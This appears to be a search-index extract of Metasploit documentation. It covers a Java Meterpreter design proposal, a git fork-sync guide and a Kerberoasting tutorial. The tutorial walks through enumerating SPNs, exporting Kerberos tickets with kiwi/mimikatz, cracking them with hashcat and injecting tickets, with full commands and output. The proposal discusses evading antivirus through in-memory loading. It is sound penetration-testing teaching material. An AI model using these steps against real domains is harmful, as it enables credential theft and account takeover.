‘bigger’ stdapi with the additional Railgun functionality when a post module requires Railgun. This would work as follows: . sequenceDiagram msfconsole-&amp;gt;&amp;gt;+meterpreter: load core library meterpreter--&amp;gt;&amp;gt;-msfconsole: return success and list of available commands msfconsole-&amp;gt;&amp;gt;+meterpreter: get architecture from core library meterpreter--&amp;gt;&amp;gt;-msfconsole: e.g. Windows 10 x64 msfconsole-&amp;gt;&amp;gt;+meterpreter: load stdapi as normal, without JNA/Railgun meterpreter-&amp;gt;&amp;gt;meterpreter: Load new java commands meterpreter--&amp;gt;&amp;gt;-msfconsole: return success and list of available commands user-&amp;gt;&amp;gt;+msfconsole:run post module: msfconsole-&amp;gt;&amp;gt;msfconsole: Load module, verify requirements opt If module requires Railgun, and session hasn't been sent Railgun/JNA before rect rgb(191, 223, 255, .3) msfconsole-&amp;gt;&amp;gt;+meterpreter: load 'bigger' stdapi - i.e. classfiles + JNA + Railgun dll meterpreter-&amp;gt;&amp;gt;meterpreter: Load new java commands note right of meterpreter: Keep JNA + Railgun library in memory&amp;lt;br /&amp;gt;Don't load them yet meterpreter--&amp;gt;&amp;gt;-msfconsole: return success and list of available commands end end msfconsole-&amp;gt;&amp;gt;+meterpreter: Railgun call rect rgb(191, 223, 255, .3) note right of meterpreter: Load JNA if it's &amp;lt;br &amp;gt;not been loaded before meterpreter-&amp;gt;&amp;gt;meterpreter: Copy JNA from classpath to file system meterpreter-&amp;gt;&amp;gt;meterpreter: System.load(tempPath) meterpreter-&amp;gt;&amp;gt;meterpreter: tempPath.deleteOnExit() end rect rgb(191, 223, 255, .3) note right of meterpreter: Load Railgun if it's &amp;lt;br &amp;gt;not been loaded before meterpreter-&amp;gt;&amp;gt;meterpreter: Use JNA to reflectively load Railgun end meterpreter-&amp;gt;&amp;gt;meterpreter: invoke Railgun call meterpreter--&amp;gt;&amp;gt;-msfconsole: Railgun result msfconsole--&amp;gt;&amp;gt;-user: Module results . Unfortunately the Meterpreter compatibility data in modules are not granular enough - and it is likely that a post module will implicitly load Railgun via a transitive module mixin. For instance, at the time of writing the lib/msf/core/post/file.rb mixin specifies a requirement on Railgun. This would result in most modules sending the Railgun/JNA libraries to Meterpreter when they are not required, as it is unlikely that the get_drives method would be invoked. This compatibility metadata could be improved, but is a blocker for this implementation. Alternative Implementation 2 . An alternative implementation to moving the architecture detection from stdapi to core - would be to include all possibly supported platform types for the JNA / Railgun libraries - approx. 3MB of additional data. This is not a viable solution. ",
    "url": "/docs/development/propsals/java-meterpreter-feature-parity-proposal.html#implementation",
    "relUrl": "/docs/development/propsals/java-meterpreter-feature-parity-proposal.html#implementation"
  },"502": {
    "doc": "Java Meterpreter Feature Parity Proposal",
    "title": "Loading Libraries",
    "content": "Java supports loading native libraries with either System.load(String libname) or System.loadLibrary(String filename). These methods require writing the shared library to disk temporarily, as it does not support loading libraries from memory. When temporarily extracting the JNA library to disk, we would need to make sure that we can delete it when we are done with the Meterpreter session. This can be achieved using Java’s File.deleteOnExit() method. This is executed only if the session exits as expected; crashes or getting killed by the AV results in the library being left on disk. Writing a shared library to disk is an easy way to get flagged by an AV that’s running on the victim’s machine. This might not be an issue as to get a Java Meterpreter session in the first place, e.g. the Microsoft Defender AV has to be disabled, and the JNA library might be white-listed. Another approach that we have briefly evaluated is running shellcode from Java without using JNI, which may be possible with schierlm’s Java Shellcode prototype. Which can execute shellcode in memory. There may be compatibility edge cases with each JDK/JRE version - depending on the JVM memory layout. This approach has only been verified to work on 32 bit Oracle Java 6. Each Java version may require additional logic, and automated/manual verification steps to ensure it works as expected. The development effort to support x64 is currently unknown. The shellcode used with the JIT Shellcode Runner would let us load a shared library from memory. This would avoid the need to write the shared library to disk. Therefore, short term solution: . | Write JNA to disk, as it’s got a higher chance of being allowed by the file system | Use JNA to reflectively load our custom Railgun C library - resulting in the Railgun library not being written to disk | . Long term solution: . | Attempt to reflectively load JNA via reflection, which may be possible with schierlm’s Java Shellcode prototype - but the proof of concept was only verified to currently work with 32bit Java 1.7, and may not work on newer versions | Use the above reflection approach to also load Railgun | . ",
    "url": "/docs/development/propsals/java-meterpreter-feature-parity-proposal.html#loading-libraries",
    "relUrl": "/docs/development/propsals/java-meterpreter-feature-parity-proposal.html#loading-libraries"
  },"503": {
    "doc": "Java Meterpreter Feature Parity Proposal",
    "title": "CI/Maven changes",
    "content": "Maven would be updated to support building the Railgun libraries for each platform/architecture type that is supported. The required build artifacts would be chosen at runtime by msfconsole and sent to the Java Meterpreter session as part of stdapi. An alternative to msfconsole bundling the stdapi dependencies at runtime, would involve building multiple pre-built Meterpreter Jar files for all of the possible platform/architectures. ",
    "url": "/docs/development/propsals/java-meterpreter-feature-parity-proposal.html#cimaven-changes",
    "relUrl": "/docs/development/propsals/java-meterpreter-feature-parity-proposal.html#cimaven-changes"
  },"504": {
    "doc": "Java Meterpreter Feature Parity Proposal",
    "title": "Conclusion",
    "content": "There are quite a few moving parts to implementing this solution for Java. The simplest approaches have been chosen for this proposal. ",
    "url": "/docs/development/propsals/java-meterpreter-feature-parity-proposal.html#conclusion",
    "relUrl": "/docs/development/propsals/java-meterpreter-feature-parity-proposal.html#conclusion"
  },"505": {
    "doc": "Java Meterpreter Feature Parity Proposal",
    "title": "Java Meterpreter Feature Parity Proposal",
    "content": " ",
    "url": "/docs/development/propsals/java-meterpreter-feature-parity-proposal.html",
    "relUrl": "/docs/development/propsals/java-meterpreter-feature-parity-proposal.html"
  },"506": {
    "doc": "Keeping in sync with rapid7 master",
    "title": "Some Terminology",
    "content": "In this quick HOWTO, we’ll be referring to the rapid7 fork of metasploit-framework as upstream. It’s a pretty common local configuration, advocated by the development environment setup. Your fork of metasploit-framework will be referred to as origin. The term ‘repo’ is short for ‘Repository.’ Also known as ‘fork’ (as a noun). ",
    "url": "/docs/development/get-started/git/keeping-in-sync-with-rapid7-master.html#some-terminology",
    "relUrl": "/docs/development/get-started/git/keeping-in-sync-with-rapid7-master.html#some-terminology"
  },"507": {
    "doc": "Keeping in sync with rapid7 master",
    "title": "The Easy Way",
    "content": "The easiest way to keep in sync with master is to trash your fork of metasploit-framework, and re-fork. This is a surprisingly common practice, since most people in the world don’t work with Metasploit every day. If you’re the sort to be struck by hackerish inspiration every few months, and couldn’t give a whit about preserving branches, history, or pull requests, simply nuke your local fork. On your fork, in the GitHub UI, go to Settings, scroll down to the Danger Zone, and hit Delete this repository. Once you’ve re-authenticated, re-fork the metasploit-framework repository by going to the Rapid7 repo and hit Fork as hard as you possibly can. ",
    "url": "/docs/development/get-started/git/keeping-in-sync-with-rapid7-master.html#the-easy-way",
    "relUrl": "/docs/development/get-started/git/keeping-in-sync-with-rapid7-master.html#the-easy-way"
  },"508": {
    "doc": "Keeping in sync with rapid7 master",
    "title": "The Hard Way",
    "content": "If you’re contributing to the Metasploit Framework a lot, first off, THANK YOU. Metasploit is more than a framework, it’s a collective and a community of people around the world who are driven to make the Internet – and therefore, human civilization – a better place. Gushing aside, if you want to keep in sync with upstream, the hard way (and therefore, best way), is to have a local clone of origin/mestasploit-framework on your local workstation. (Linux is preferred, but there are servicable solutions for OSX and Windows). And, with that said, the GitHub documentation is pretty excellent in explaining how to do this – it’s really not all that hard. Take a look at their Fork A Repo docs, and do what it says. One thing I like to do is to keep separate branches for master (which tracks origin/master), and upstream-master (which tracks, unsurprisingly, upstream/master). If you just want to know how to add an upstream remote, check it out. Once you’ve done that, all you need to do is to pull one of these: . git checkout -b upstream-master --track upstream/master git checkout master git merge --ff-only upstream-master git commit git push origin . Now, this only works well if you never commit to master. If you do, you’re going to have a bad time, as you’ll eventually hit a dreaded merge conflict. Any change you make, be it for local experimentation or public proposal, should be done in a branch from the master branch (or, if you’re a habitual committer, a branch off the upstream-master branch). Ignore this advice at your own peril. ",
    "url": "/docs/development/get-started/git/keeping-in-sync-with-rapid7-master.html#the-hard-way",
    "relUrl": "/docs/development/get-started/git/keeping-in-sync-with-rapid7-master.html#the-hard-way"
  },"509": {
    "doc": "Keeping in sync with rapid7 master",
    "title": "The Max Powers Way",
    "content": "It’s like the wrong way, but faster. - Max Powers . If you are allergic to the command line, it is possible to sync with upstream/master via the GitHub web UI. This is a little messy, but it’s handy if you have small changes that you don’t care to sign (by the way, you should sign your commits). First, go to the Rapid7 branch, and click the green, somewhat subtle mini-PR button. Then, click Compare across forks, and set base fork to your fork, while leaving the head fork pointing to Rapid7’s fork. That’ll take you to a URL like this: https://github.com/rapid7/metasploit-framework/compare/YOURGITHUBNAME:master...master . Next, you’ll hit the big green Create a Pull Request button, which will drop you to a new PR page, against your own fork. Fill it in, then immediately click the PRs icon on the left side, find your new PR, and merge it. This will keep your GitHub-hosted fork up-to-date, and if you prefer using the GitHub UI over a real development environment, you can jump in and start making changes there. This method is especially handy for light changes, like documentation or cosmetic changes to modules. However, using the GitHub UI means that you are necessarily not testing new modules or libraries, and you of course cannot sign your commits, which is horrifying. It’s also nice for people very new to GitHub as a collaborative platform. ",
    "url": "/docs/development/get-started/git/keeping-in-sync-with-rapid7-master.html#the-max-powers-way",
    "relUrl": "/docs/development/get-started/git/keeping-in-sync-with-rapid7-master.html#the-max-powers-way"
  },"510": {
    "doc": "Keeping in sync with rapid7 master",
    "title": "Keeping in sync with rapid7 master",
    "content": " ",
    "url": "/docs/development/get-started/git/keeping-in-sync-with-rapid7-master.html",
    "relUrl": "/docs/development/get-started/git/keeping-in-sync-with-rapid7-master.html"
  },"511": {
    "doc": "Kerberoasting",
    "title": "Kerberoasting",
    "content": "Kerberoasting is a technique that finds Service Principal Names (SPN) in Active Directory that are associated with normal user accounts on the domain, and then requesting Ticket Granting Service (TGS) tickets for those accounts from the KDC. These TGS tickets are encrypted with the Service’s password, which may be weak - and susceptible to brute force attacks. Services are normally configured to use computer accounts which have very long and secure passwords, but services associated with normal user accounts will have passwords entered by a human and may be short and weak - and a good target for brute attacks. If successful, the attacker possesses user credentials that can be used to impersonate the account owner. Now the attacker appears to be an approved and legitimate user - having access to the same privileges, assets, systems, etc, that have been granted to the compromised account, boom roasted. ",
    "url": "/docs/pentesting/active-directory/kerberos/kerberoasting.html",
    "relUrl": "/docs/pentesting/active-directory/kerberos/kerberoasting.html"
  },"512": {
    "doc": "Kerberoasting",
    "title": "Vulnerable Targets",
    "content": "Any system leveraging Kerberos as a means of authentication e.g. Active Directory, MSSQL, which have Service Principal Names (SPN) associated with normal user accounts on the domain. ",
    "url": "/docs/pentesting/active-directory/kerberos/kerberoasting.html#vulnerable-targets",
    "relUrl": "/docs/pentesting/active-directory/kerberos/kerberoasting.html#vulnerable-targets"
  },"513": {
    "doc": "Kerberoasting",
    "title": "Lab Environment",
    "content": "For testing purposes on an Active Directory environment you can create a user account and register an SPN manually as an example of this technique: . # Create a basic user account with a weak password for our service net user /add svc_kerberoastable password123 # Mark the account and password as never expiring, to ensure the lab setup still works in the future net user svc_kerberoastable /expires:never powershell /c Set-AdUser -Identity svc_kerberoastable -PasswordNeverExpires $true # Create a Service Principal Name which uses the user account with a weak password cmd /c setspn -a %computername%/svc_kerberoastable.%userdnsdomain%:1337 %userdomain%\\svc_kerberoastable . ",
    "url": "/docs/pentesting/active-directory/kerberos/kerberoasting.html#lab-environment",
    "relUrl": "/docs/pentesting/active-directory/kerberos/kerberoasting.html#lab-environment"
  },"514": {
    "doc": "Kerberoasting",
    "title": "Scenarios",
    "content": "Using get_user_spns . The easiest way to enumerate Kerberoastable accounts is with the auxiliary/gather/get_user_spns module which internally leverages Impacket. This module will automatically query LDAP for Kerberoastable SPNs and request a Kerberos service ticket that may be encrypted using the weak password which can be bruteforced: . use auxiliary/gather/get_user_spns run rhost=192.168.123.13 user=&amp;lt;username&amp;gt; pass=&amp;lt;password&amp;gt; domain=&amp;lt;domain&amp;gt; . If you followed the lab setup setup above, this should output the following result: . msf6 auxiliary(gather/get_user_spns) &amp;gt; run rhost=192.168.123.13 user=Administrator pass=p4$$w0rd domain=adf3.local [*] Running for 192.168.123.13... [+] ServicePrincipalName Name MemberOf PasswordLastSet LastLogon Delegation [+] -------------------------------------- ------------------ -------- -------------------------- --------- ---------- [+] DC3/svc_kerberoastable.ADF3.LOCAL:1337 svc_kerberoastable 2023-01-23 23:52:19.445592 &amp;lt;never&amp;gt; [+] $krb5tgs$23$*svc_kerberoastable$ADF3.LOCAL$adf3.local/svc_kerberoastable*$c2e73c1dcdcef4c926cb263abedf75ed$263fea3ad446bd6b4b8... etc etc ... The final line contains the service ticket hash in a crackable format. Next paste this hash $krb5tgs$23$*svc_kerberoastable$ADF3.LOCAL$adf3.local/svc_kerberoastable*$c2e73c1..etc etc... into a new file called hash.txt You can run Hashcat to crack the hash with a wordlist of choice, and see if the status of the hash has been marked as cracked: . $ hashcat -m 13100 --force -a 0 hash.txt /usr/share/wordlists/rockyou.txt ... etc ... Session..........: hashcat Status...........: Cracked ... etc ... If the password has been cracked you can view the result at a later date with the above command and --show appended: . $ hashcat -m 13100 --force -a 0 hash.txt /usr/share/wordlists/rockyou.txt --show $krb5tgs$23$*svc_kerberoastable$ADF3.LOCAL$adf3.local/svc_kerberoastable*$c2e73c1dcdcef4c926cb...etc etc...:password123 ^ cracked password . Now that you have access to the password of the service account, you can use this to enumerate further in the AD environment. Manual workflow . An alternative to the easier get_user_spns module above is the more manual process of running the LDAP query module to find Kerberoastable accounts, requesting service tickets with Kiwi, converting the Kiwi ticket to a format usable by hashcat, and cracking the hash. | Start msfconsole | Obtain SPNs associated with user accounts from your target . | Do: use auxiliary/gather/ldap_query | Do: set action ENUM_USER_SPNS_KERBEROAST | Run the module and note the discovered SPNs | . | From your Meterpreter session: . | Do: load kiwi | Do: Request a kerberos ticket for SPN found by the ldap_query module: kiwi_cmd kerberos::ask /target:https/TSTWLPT1000000 | Do: kerberos_ticket_list | . | Export service tickets using the kiwi extension . | Do: kiwi_cmd kerberos::list /export | . | Crack the encrypted password in the service ticket using tgsrepcrack.py (more info on this python script below) . | Do: python3 tgsrepcrack.py passlist.txt 1-40a10000-Administrator@HTTP\\~testService-EXAMPLE.COM.kirbi | . | Rewrite the service tickets using kerberoast.py (more info on this python script below) . | Do: python3 kerberoast.py -p N0tpassword! -r 1-40a10000-Administrator@HTTP~testService-EXAMPLE.COM.kirbi -w Administrator.kirbi -u 500 | . | Finally inject the ticket back into RAM using Meterpreter’s kiwi extension . | meterpreter &amp;gt; kiwi_cmd kerberos::ptt Administrator.kirbi | . | . First an SPN needs to be found. This can be done in a number of ways - including using metasploit’s very own auxiliary/gather/ldap_query module: . msf6 &amp;gt; use auxiliary/gather/ldap_query msf6 auxiliary(gather/ldap_query) &amp;gt; set RHOSTS 172.16.199.235 RHOSTS =&amp;gt; 172.16.199.235 msf6 auxiliary(gather/ldap_query) &amp;gt; set BIND_DN DARWIN_CLAY BIND_DN =&amp;gt; DARWIN_CLAY msf6 auxiliary(gather/ldap_query) &amp;gt; set BIND_PW N0tpassword! BIND_PW =&amp;gt; N0tpassword! msf6 auxiliary(gather/ldap_query) &amp;gt; set action ENUM_USER_SPNS_KERBEROAST action =&amp;gt; ENUM_USER_SPNS_KERBEROAST msf6 auxiliary(gather/ldap_query) &amp;gt; run [*] Running module against 172.16.199.235 [+] Successfully bound to the LDAP server! [*] Discovering base DN automatically [*] 172.16.199.235:389 Getting root DSE dn: namingcontexts: DC=example,DC=com namingcontexts: CN=Configuration,DC=example,DC=com namingcontexts: CN=Schema,CN=Configuration,DC=example,DC=com ... ====================================================================== Name Attributes ---- ---------- cn BERYL_SAVAGE samaccountname BERYL_SAVAGE serviceprincipalname CIFS/OGCWLPT1000000 CN=CAITLIN_CAMPBELL OU=Devices OU=FIN OU=Tier 1 DC=example DC=com ================================================================= Name Attributes ---- ---------- cn CAITLIN_CAMPBELL samaccountname CAITLIN_CAMPBELL serviceprincipalname ftp/BDEWSECS1000000 CN=NETTIE_BURNS OU=ITS OU=Stage DC=example DC=com ================================================= Name Attributes ---- ---------- cn ALBERTO_OLSEN samaccountname ALBERTO_OLSEN serviceprincipalname https/TSTWWKS1000002 CN=LESSIE_PHILLIPS OU=Test OU=GOO OU=Stage DC=example DC=com ============================================================ . Great, we now have a couple SPNs to move forward with. Request Service Tickets - with kiwi . If you have a running Meterpreter session you can request a Service Ticket using the kiwi extension and one of the SPNs found above: . meterpreter &amp;gt; load kiwi Loading extension kiwi...#####. mimikatz 2.2.0 20191125 (x64/windows) .## ^ ##. \"A La Vie, A L'Amour\" - (oe.eo) ## / \\ ## /*** Benjamin DELPY `gentilkiwi` ( [email protected] ) ## \\ / ## &amp;gt; http://blog.gentilkiwi.com/mimikatz '## v ##' Vincent LE TOUX ( [email protected] ) '#####' &amp;gt; http://pingcastle.com / http://mysmartlogon.com ***/ Success. meterpreter &amp;gt; kiwi_cmd kerberos::ask /target:https/TSTWLPT1000000 Asking for: https/TSTWLPT1000000 * Ticket Encryption Type &amp;amp; kvno not representative at screen Start/End/MaxRenew: 12/16/2022 4:58:34 PM ; 12/17/2022 1:35:41 AM ; 12/23/2022 3:35:41 PM Service Name (02) : https ; TSTWLPT1000000 ; @ EXAMPLE.COM Target Name (02) : https ; TSTWLPT1000000 ; @ EXAMPLE.COM Client Name (01) : Administrator ; @ EXAMPLE.COM Flags 40a10000 : name_canonicalize ; pre_authent ; renewable ; forwardable ; Session Key : 0x00000017 - rc4_hmac_nt 07137dd7d5b801ef8b05c73380b18701 Ticket : 0x00000017 - rc4_hmac_nt ; kvno = 0 [...] . Tickets in the current session can be viewed like so: . meterpreter &amp;gt; kerberos_ticket_list [+] Kerberos tickets found in the current session. [00000000] - 0x00000012 - aes256_hmac Start/End/MaxRenew: 12/16/2022 3:35:41 PM ; 12/17/2022 1:35:41 AM ; 12/23/2022 3:35:41 PM Server Name : krbtgt/EXAMPLE.COM @ EXAMPLE.COM Client Name : Administrator @ EXAMPLE.COM Flags 40e10000 : name_canonicalize ; pre_authent ; initial ; renewable ; forwardable ; [00000001] - 0x00000017 - rc4_hmac_nt Start/End/MaxRenew: 12/16/2022 4:58:34 PM ; 12/17/2022 1:35:41 AM ; 12/23/2022 3:35:41 PM Server Name : https/TSTWLPT1000000 @ EXAMPLE.COM Client Name : Administrator @ EXAMPLE.COM Flags 40a10000 : name_canonicalize ; pre_authent ; renewable ; forwardable ; . Export Service Tickets . meterpreter &amp;gt; kiwi_cmd kerberos::list /export [00000001] - 0x00000017 - rc4_hmac_nt Start/End/MaxRenew: 12/16/2022 4:58:34 PM ; 12/17/2022 1:35:41 AM ; 12/23/2022 3:35:41 PM Server Name : https/TSTWLPT1000000 @ EXAMPLE.COM Client Name : Administrator @ EXAMPLE.COM Flags 40a10000 : name_canonicalize ; pre_authent ; renewable ; forwardable ; ==================== Base64 of file : 1-40a10000-Administrator@https~TSTWLPT1000000-EXAMPLE.COM.kirbi ==================== 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 MDAwMA== ==================== * Saved to file : 1-40a10000-Administrator@https~TSTWLPT1000000-EXAMPLE.COM.kirbi . Crack Kiwi’s Service Tickets . To crack the service ticket a number of tools can be used. In this example we’ll use hashcat. First we need to convert the ticket we retrieved in the .kirbi format to a format parsable by hashcat. The script kirbi2john is part of Tim Medin Kerberoast toolkit is perfect for this task. First clone the repo then run the script against the .kirbi file. msfuser@ubuntu:~/git$ git clone https://github.com/nidem/kerberoast.git msfuser@ubuntu:~/git$ cd kerberoast msfuser@ubuntu:~/git/kerberoast$ python3 kirbi2john.py ~/1-40a10000-Administrator@HTTP~testService-EXAMPLE.COM.kirbi $krb5tgs$23$*1-40a10000-Administrator@HTTP~testService-EXAMPLE.COM*$2b5cda0496cdd9cfb11a00a9b03a0d31$76975a9115860927140 3a1808746b35d0e99159553e3c81a9cd32a51e968a4b45ce3fcf08e5eac8d4551df10c9f1bd4572cc273d1bd154fc8fd1228d55cd39a90b64ec3117f e0a1fb496d1be4042ccb2998d998fa3de8f50bcb04d3bf78e34be07d71310a3be829e24cb75c398847f960aefe9669534df26344beb6e7bbe628b7ac fa957c4a67417546fc441b84aaee78a0e5256cc9dead287327ac7907af71e02b142027c9061515c72ef03c842d0f73754f9dffa434a26057df4c4434 71cd5bf76260469ea6f1c367a64ea02b01a2b9c2b83979911fc58fa8822c70877b72370078e3d7955fc2ade02acd2a803889a8c3a609f80f9beb45c0 981aba6bdbb208fa6ea2cc91814c8c4dd6e9287f4ef3b9e2b7febe07648c78ec25137e82bee0d99290a33fd3701953bd858fac15c6d1652f11cc75a6 e419cab7dec019e599eda3a76652475968bc2845fa6f02477efaecfd63e58fad817f1976adeda14b2c4c1508a84df1813e05368c3e07c9f656d5730d 848b86c59bf576f4c2505375b7d6934abf8a955b1a71d802026383cbd9005bf12f0664ffc25ebee8aef4b574dd93850d59fc16c5f9881e9b4f957c33 74724e4046c0fa4bc5ff16b9a960b4b6a2ede25bb18c617c2dbcfb3fd34a4cc3ee29fb0f6e6f43722ffc50ceddce55b2be1a53361d13c983980d3191 86c7dbd124a3c8f19560e88d0d858b0f5320738931bf2f32c1e893fbbadb92f7574128f6f36a0acab99023f79d857f15f0920a1a76b3a97e6282d4e6 c5ef30206444bc20da1a7d89d1007a97e75ffb9554cfeaf6757919a635dbdfcfd74d2eec8d5f83f109beb6e653a8c0e787ec039c7bb93d07a60e8bb4 b56d026e809a80e020875a3a382b367f28c0e41714bd5ef97da578956cba12ab1fbcd84a5313d2edc5f7c601c3c56860a347ab013f50e3f8e6167935 9db05e4014db38e21a814fe002ba14d17840aa053bbec3a6aadec31db50827168d24107486d373567c2969215c0decf639bc46b9968e43a79bc6f261 2544feb09908118615035f630e37b03cb04d9725d2085a28543575d91c361bf1b6a61837d6c34c8961df33d1b8b45963bf361d33e0ca2fa37b40e62b 6389ebb0ad4097036f4d6aa4598086313ea79d68f75301d5038783567c2fdcf25e2b459acdc867c64613fe84f3faf1fdb79fc6e05322b2175eec3b2e 84e3a8165f0af265d3ccd994712704516f0c78f76dd7c5c98f8fc8b9db1231f19c259bc7f078a86d4bc6cf06b8c4158dc41f48dd51b146d3fc63d2fd f057e6644f838a944de0679ab3e8c6290d4d8004bd53570f61323eeb7c910c6546880a508172bf4ee2fa1c87748ec0e2e2f79e03e963affb593f1391 a62fdf2f29b792b1c0e7ece2645381a4284b56ddc525c842589eca39efa0466418c9bfb60df479015f4fac86d38575aad1f29674a12d873f8fc12415 b6ea7b2cb15c9d422f0f904a6af518f12c4e0e362093d8d33a47672973f6d70e80669666f37d6674ef8e2999c92fa38b5de8e266716bb182527bde17 36bcb926a6340ae92f8b338be2fe5fa3a757894679beba5b296fe0cdc11100b9a536264cb5e3cb3c6d0426acaa7dd3928895d32973fab2698d17fff4 f9f1ecd02102f5bbd222b039ca3e30fed4003be6b70b2e492c8ea5eee92439681d6af767547609a87d47b68ba7ca62dbe3e4bf74e081915ab15e4103 8839b74263ddbd087c90b6262dd5684e078068c28ccc0c115e3 tickets written: 1 . Copy the above hash to a file called hash.txt. Ensure hashcat is installed: msfuser@ubuntu:~/git/kerberoast$ sudo apt install hashcat . With a word list of your choice run the following command: . msfuser@ubuntu:~/git/kerberoast$ hashcat -m 13100 --force -a 0 hash.txt wordlist.txt hashcat (v5.1.0) starting... OpenCL Platform #1: The pocl project ==================================== * Device #1: pthread-Intel(R) Core(TM) i7-9750H CPU @ 2.60GHz, 16384/41063 MB allocatable, 6MCU Hashes: 1 digests; 1 unique digests, 1 unique salts Bitmaps: 16 bits, 65536 entries, 0x0000ffff mask, 262144 bytes, 5/13 rotates Rules: 1 Applicable optimizers: * Zero-Byte * Not-Iterated * Single-Hash * Single-Salt Minimum password length supported by kernel: 0 Maximum password length supported by kernel: 256 ATTENTION! Pure (unoptimized) OpenCL kernels selected. This enables cracking passwords and salts &amp;gt; length 32 but for the price of drastically reduced performance. If you want to switch to optimized OpenCL kernels, append -O to your commandline. Watchdog: Hardware monitoring interface not found on your system. Watchdog: Temperature abort trigger disabled. * Device #1: build_opts '-cl-std=CL1.2 -I OpenCL -I /usr/share/hashcat/OpenCL -D LOCAL_MEM_TYPE=2 -D VENDOR_ID=64 -D CUDA_ARCH=0 -D AMD_ROCM=0 -D VECT_SIZE=8 -D DEVICE_TYPE=2 -D DGST_R0=0 -D DGST_R1=1 -D DGST_R2=2 -D DGST_R3=3 -D DGST_ELEM=4 -D KERN_TYPE=13100 -D _unroll' * Device #1: Kernel m13100_a0-pure.64a04b9e.kernel not found in cache! Building may take a while... Dictionary cache built: * Filename..: wordlist.txt * Passwords.: 3 * Bytes.....: 33 * Keyspace..: 3 * Runtime...: 0 secs The wordlist or mask that you are using is too small. This means that hashcat cannot use the full parallel power of your device(s). Unless you supply more work, your cracking speed will drop. For tips on supplying more work, see: https://hashcat.net/faq/morework Approaching final keyspace - workload adjusted. $krb5tgs$23$*1-40a10000-Administrator@HTTP~testService-EXAMPLE.COM*$2b5cda0496cdd9cfb11a00a9b03a0d31$76975a9115860927140 &amp;lt;truncated due to size&amp;gt; Session..........: hashcat Status...........: Cracked Hash.Type........: Kerberos 5 TGS-REP etype 23 Hash.Target......: $krb5tgs$23$*1-40a10000-Administrator@HTTP~testServ...c115e3 Time.Started.....: Tue Jan 10 07:41:11 2023 (0 secs) Time.Estimated...: Tue Jan 10 07:41:11 2023 (0 secs) Guess.Base.......: File (wordlist.txt) Guess.Queue......: 1/1 (100.00%) Speed.#1.........: 26 H/s (0.03ms) @ Accel:32 Loops:1 Thr:64 Vec:8 Recovered........: 1/1 (100.00%) Digests, 1/1 (100.00%) Salts Progress.........: 3/3 (100.00%) Rejected.........: 0/3 (0.00%) Candidates.1.....: test123 -&amp;gt; N0tpassword! . If you want to view the hash + cracked password at a later date run the above command with --show appended. msfuser@ubuntu:~/git/kerberoast$ hashcat -m 13100 --force -a 0 hash.txt wordlist.txt --show 